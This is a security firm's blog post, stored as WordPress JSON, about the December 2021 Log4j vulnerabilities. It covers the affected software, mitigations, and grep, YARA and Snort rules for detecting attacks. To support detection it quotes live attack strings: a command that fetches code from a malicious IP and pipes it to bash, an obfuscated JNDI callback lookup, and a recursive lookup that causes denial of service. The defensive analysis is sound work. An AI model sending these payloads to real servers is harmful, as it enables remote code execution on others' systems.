{"id":4189,"date":"2021-12-13T15:23:11","date_gmt":"2021-12-13T15:23:11","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=4189"},"modified":"2023-09-16T10:59:45","modified_gmt":"2023-09-16T10:59:45","slug":"log4j-come-proteggere-i-sistemi","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/uncategorized-it\/log4j-come-proteggere-i-sistemi\/","title":{"rendered":"Log4j &#8211; Cyber attacks and defence"},"content":{"rendered":"\n<p class=\"text-align:justify\">During the first weeks of <strong>December 2021<\/strong>, attacks involving the <strong>Apache Log4j library<\/strong> were detected. On 12 December a security bulletin was officially published for a severe <strong>Remote Command Execution<\/strong> vulnerability, <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\">CVE-2021-44228<\/a>.<\/p>\n\n\n\n<p><strong>Vulnerable systems exposed on public networks<\/strong> should be considered <strong>compromised<\/strong>, given the mass <em>exploitation<\/em> activity observed worldwide.<\/p>\n\n\n\n<p>The Apache Software Foundation has already released an <strong>emergency security update<\/strong> that fixes the 0-day vulnerability; the version that corrects the bug is <strong>2.15.0<\/strong>.<\/p>\n\n\n\n<p>Alongside the publication of CVE-2021-44228 for Log4j 2, a similar vulnerability was identified in the 1.x versions of the same product, affecting configurations that use the <strong>JMSAppender<\/strong> class. The vulnerability, tracked as <strong>CVE-2021-4104<\/strong>, therefore does not depend on user input in this case but on the configuration in use.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Update of 20\/12\/2021<\/strong><\/h2>\n\n\n\n<p>New vulnerabilities have been identified in <strong>Log4j 2.15.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45046\">CVE-2021-45046<\/a>) and <strong>2.16.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45105\">CVE-2021-45105<\/a>), the releases distributed as patches for the vulnerable version (2.14.0). Updating to version <strong>2.17.0<\/strong>, which fixes the security issues found in the earlier releases, is recommended.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>CVE-2021-45046<\/strong><\/h3>\n\n\n\n<p>The patch for CVE-2021-44228 turned out to be incomplete in certain non-default configurations. If the logging configuration uses a non-default Pattern Layout with a <strong>Context Lookup<\/strong> (for example $${ctx:loginId}), an attacker who controls the input data of the <strong>Thread Context Map<\/strong> (MDC) can supply specially crafted data using a JNDI Lookup pattern, which in some operating environments leads to an information <strong>leak<\/strong> and <strong>remote code execution<\/strong>, and in all environments to local code execution.<br><br>To remedy this vulnerability Apache released Log4j version <strong>2.16.0<\/strong>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>CVE-2021-45105<\/strong><\/h3>\n\n\n\n<p>Log4j versions from 2.0-alpha1 up to 2.16.0 (except 2.12.3) do not protect against uncontrolled <strong>recursion<\/strong> in <strong>self-referential lookups<\/strong>. An attacker who controls the Thread Context Map data can cause a <strong>Denial of Service<\/strong> (DoS) when a specially crafted string is interpreted (for example: <strong>${${::-${::-$${::-j}}}}<\/strong>).<\/p>\n\n\n\n<p>To remedy this vulnerability Apache released Log4j version <strong>2.17.0<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/images.hothardware.com\/contentimages\/newsitem\/57029\/content\/Apache-Log4j-Logo.png\" alt=\"Apache Log4j Logo\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Identifying the attack and mitigating the risk<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#Grep\">From application logs<\/a><\/li>\n\n\n\n<li><a href=\"#Yara\">YARA rules<\/a><\/li>\n\n\n\n<li><a href=\"#Snort\">Snort\/Suricata IDS<\/a><\/li>\n\n\n\n<li><a href=\"#mitigazione\">How to mitigate the risk<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">Countries of origin of the scans<\/h3>\n\n\n\n<p>Below is an overview of the attackers&#8217; IP addresses:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1004\" height=\"421\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png\" alt=\"\" 
class=\"wp-image-4190\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png 1004w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-300x126.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-768x322.png 768w\" sizes=\"(max-width: 1004px) 100vw, 1004px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\" id=\"h-i-dettagli-della-vulnerabilita-e-dell-attacco\">Details of the vulnerability and the attack<\/h2>\n\n\n\n<p>Technical details for identifying, analysing and mitigating the risk of compromise.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Which applications have been affected<\/h3>\n\n\n\n<p>Many Java-based applications are vulnerable, among them:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Elastic Search<\/li>\n\n\n\n<li>Elastic LogStash<\/li>\n\n\n\n<li>GrayLog2<\/li>\n\n\n\n<li>Minecraft (client and server)<\/li>\n\n\n\n<li>Neo4J<\/li>\n\n\n\n<li>Apache projects (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket)<\/li>\n\n\n\n<li>VMware products (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu)<\/li>\n\n\n\n<li>Grails<\/li>\n\n\n\n<li>Custom Java products<\/li>\n\n\n\n<li>Redis<\/li>\n\n\n\n<li>Video games (e.g. Minecraft)<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-dettagli-vulnerabilita\">Vulnerability details<\/h2>\n\n\n\n<p>All versions of Apache Log4j2 (up to 2.14.1) use the <em><strong>Java Naming and Directory Interface<\/strong><\/em> (JNDI) API. These features, used in the configuration, in log messages and in parameters, do not protect against LDAP and JNDI endpoints controlled by malicious parties. An attacker able to control log messages or their parameters can therefore <strong>execute arbitrary code<\/strong> served by an LDAP server when message lookup substitution is enabled.<br>To exploit this vulnerability attackers can send an <strong>HTTP request<\/strong> containing a specially crafted string, so that Log4j writes a log entry whose content is turned into a JNDI (Java Naming and Directory Interface) request to a malicious server.<\/p>\n\n\n\n<p>When the vulnerable system processes the malicious server&#8217;s response, it executes the code injected by the attacker.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"mitigazione\">How to mitigate the threat<\/h3>\n\n\n\n<p>From Log4j <strong>2.15.0<\/strong>, message lookup substitution is disabled by default, so upgrading is the simplest and most effective solution.<\/p>\n\n\n\n<p>Other possible solutions are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In earlier versions, down to <strong>2.10<\/strong>, this threat can be mitigated by setting the system property (or the equivalent environment variable):\n<ul class=\"wp-block-list\">\n<li><strong>log4j2.formatMsgNoLookups<\/strong>=true<\/li>\n\n\n\n<li><strong>LOG4J_FORMAT_MSG_NO_LOOKUPS<\/strong>=true<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In versions <strong>before 2.10<\/strong>, it can be mitigated by removing the <strong>JndiLookup<\/strong> class from the classpath:\n<ul class=\"wp-block-list\">\n<li><strong>zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/strong><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>On <strong>Java 8u121<\/strong> set:\n<ul class=\"wp-block-list\">\n<li><strong>com.sun.jndi.rmi.object.trustURLCodebase<\/strong> = false<\/li>\n\n\n\n<li><strong>com.sun.jndi.cosnaming.object.trustURLCodebase<\/strong> = false<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Information on the ongoing attacks<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The <strong>jndi<\/strong> interface is used to fetch (via a specific protocol: dns, ldap, etc.) 
the malicious Java object:<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"359\" height=\"214\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png\" alt=\"\" class=\"wp-image-4191\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png 359w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4-300x179.png 300w\" sizes=\"(max-width: 359px) 100vw, 359px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>All requests carry the malicious payload (often in the <strong>User-Agent<\/strong> or <strong>Referer<\/strong> header)<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Most <em>payloads<\/em> are Base64-encoded:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>(curl -s &lt;IP malevolo&gt;:&lt;Porta&gt;\/&lt;IP vittima&gt;:&lt;Porta vittima&gt;||wget -q -O- &lt;IP malevolo&gt;:&lt;Porta&gt;\/&lt;IP vittima&gt;:&lt;Porta vittima&gt;)|bash<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>URIs used<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>URI<\/strong> (to use for detection)<\/td><\/tr><tr><td>\/Basic\/Command\/Base64\/&lt;Base64Code&gt;<\/td><\/tr><tr><td>\/a<\/td><\/tr><tr><td>\/callback<\/td><\/tr><tr><td>\/Exploit<\/td><\/tr><tr><td>\/epepap<\/td><\/tr><tr><td>\/b<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Obfuscation methods<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>${jndi:${lower:l}${lower:d}a${lower:p}:\/\/world80.log4j.bin${upper:a}ryedge.io:80\/callback}<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Attacker IPs<\/strong><\/h3>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Identifying the attack<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Grep\">From application logs<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code># Plain-text logs under \/var\/log: match ${jndi:...} (also with the brace URL-encoded as %7B)\nsudo egrep -I -i -r '\\$(\\{|%7B)jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#91;^\\n]+' \/var\/log\n\n\n# The same search inside rotated, gzip-compressed logs\nsudo find \/var\/log -name \\*.gz -print0 | xargs -0 zgrep -E -i '\\$(\\{|%7B)jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#91;^\\n]+'\n\n\n# Strip the ${lower:...} obfuscation wrapper before matching\nsudo find \/var\/log\/ -type f -exec sh -c \"cat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -I -i 'jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n\n# The same obfuscation-aware search for gzip-compressed logs\nsudo find \/var\/log\/ -name '*.gz' -type f -exec sh -c \"zcat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -i 'jndi:(ldap&#91;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Yara\">YARA<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>rule <strong>EXPL_Log4j_CVE_2021_44228_Dec21_Soft<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      $x1 = \"${jndi:ldap:\/\"\n      $x2 = \"${jndi:rmi:\/\"\n      $x3 = \"${jndi:ldaps:\/\"\n      $x4 = \"${jndi:dns:\/\"\n   condition:\n      1 of them\n}\n\n\nrule 
<strong>EXPL_Log4j_CVE_2021_44228_Dec21_Hard<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate the exploitation of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 80\n   strings:\n      $x1 = \/\\$\\{jndi:(ldap|ldaps|rmi|dns):\\\/&#91;\\\/]?&#91;a-z-\\.0-9]{3,120}:&#91;0-9]{2,5}\\\/&#91;a-zA-Z\\.]{1,32}\\}\/\n      $fp1r = \/(ldap|rmi|ldaps|dns):\\\/&#91;\\\/]?(127\\.0\\.0\\.1|192\\.168\\.|172\\.&#91;1-3]&#91;0-9]\\.|10\\.)\/\n   condition:\n      $x1 and not 1 of ($fp*)\n}\n\n\nrule <strong>SUSP_Base64_Encoded_Exploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/Reelix\/status\/1469327487243071493\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      \/* curl -s  *\/\n      $sa1 = \"Y3VybCAtcy\"\n      $sa2 = \"N1cmwgLXMg\"\n      $sa3 = \"jdXJsIC1zI\"\n      \/* |wget -q -O-  *\/\n      $sb1 = \"fHdnZXQgLXEgLU8tI\"\n      $sb2 = \"x3Z2V0IC1xIC1PLS\"\n      $sb3 = \"8d2dldCAtcSAtTy0g\"\n   condition:\n      1 of ($sa*) and 1 of ($sb*)\n}\n\n\nrule <strong>SUSP_JDNIExploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects indicators of JDNI usage in log files and other payloads\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/github.com\/flypig5211\/JNDIExploit\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      $xr1 = \/ldap:\\\/\\\/&#91;a-zA-Z0-9\\.]{7,80}:&#91;0-9]{2,5}\\\/(Basic\\\/Command\\\/Base64|Basic\\\/ReverseShell|Basic\\\/TomcatMemshell|Basic\\\/JBossMemshell|Basic\\\/WebsphereMemshell|Basic\\\/SpringMemshell|Basic\\\/Command|Deserialization\\\/CommonsCollectionsK|Deserialization\\\/CommonsBeanutils|Deserialization\\\/Jre8u20\\\/TomcatMemshell|Deserialization\\\/CVE_2020_2555\\\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\\\/\/\n   condition:\n      filesize &lt; 100MB and $xr1\n}\n\n\nrule <strong>SUSP_EXPL_OBFUSC_Dec21_1<\/strong> {\n   meta:\n      description = \"Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/testanull\/status\/1469549425521348609\"\n      date = \"2021-12-11\"\n      score = 60\n   strings:\n      \/* ${lower:X} - single character match *\/\n      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }\n      \/* ${upper:X} - single character match *\/\n      $ = { 24 7B 75 70 70 65 72 3A ?? 
7D }\n      \/* URL encoded lower - obfuscation in URL *\/\n      $ = \"$%7blower:\"\n      $ = \"$%7bupper:\"\n      $ = \"%24%7bjndi:\"\n      $ = \"\/$%7bjndi:\"\n   condition:\n      1 of them\n}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Snort\">Intrusion Detection: Snort\/Suricata <\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>alert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment 
Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp rmi)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldap)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp dns)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; 
fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldaps)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category 
EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#91;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK PAYLOAD<\/strong><\/h3>\n\n\n\n<p><a href=\"https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890\">https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>C2 DOMAIN NAME<\/strong><\/h3>\n\n\n\n<p><a href=\"https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8\">https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK IP<\/strong><\/h3>\n\n\n\n<p><a 
href=\"https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217\">https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>During the first weeks of December 2021, attacks involving the Apache Log4j library were detected. On 12 December a security bulletin was officially published for a severe Remote Command Execution vulnerability, CVE-2021-44228. Vulnerable systems exposed on public networks should be considered compromised, given the mass [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":4190,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[954],"tags":[1545,1547,1549,1551,1495],"class_list":["post-4189","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-it","tag-apache-it","tag-cve-2021-44228-it","tag-log4j-it","tag-rce-it","tag-vulnerability-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=4189"}],"version-history":[{"count":31,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions"}],"predecessor-version":[{"id"
:6010,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions\/6010"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/4190"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=4189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=4189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=4189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}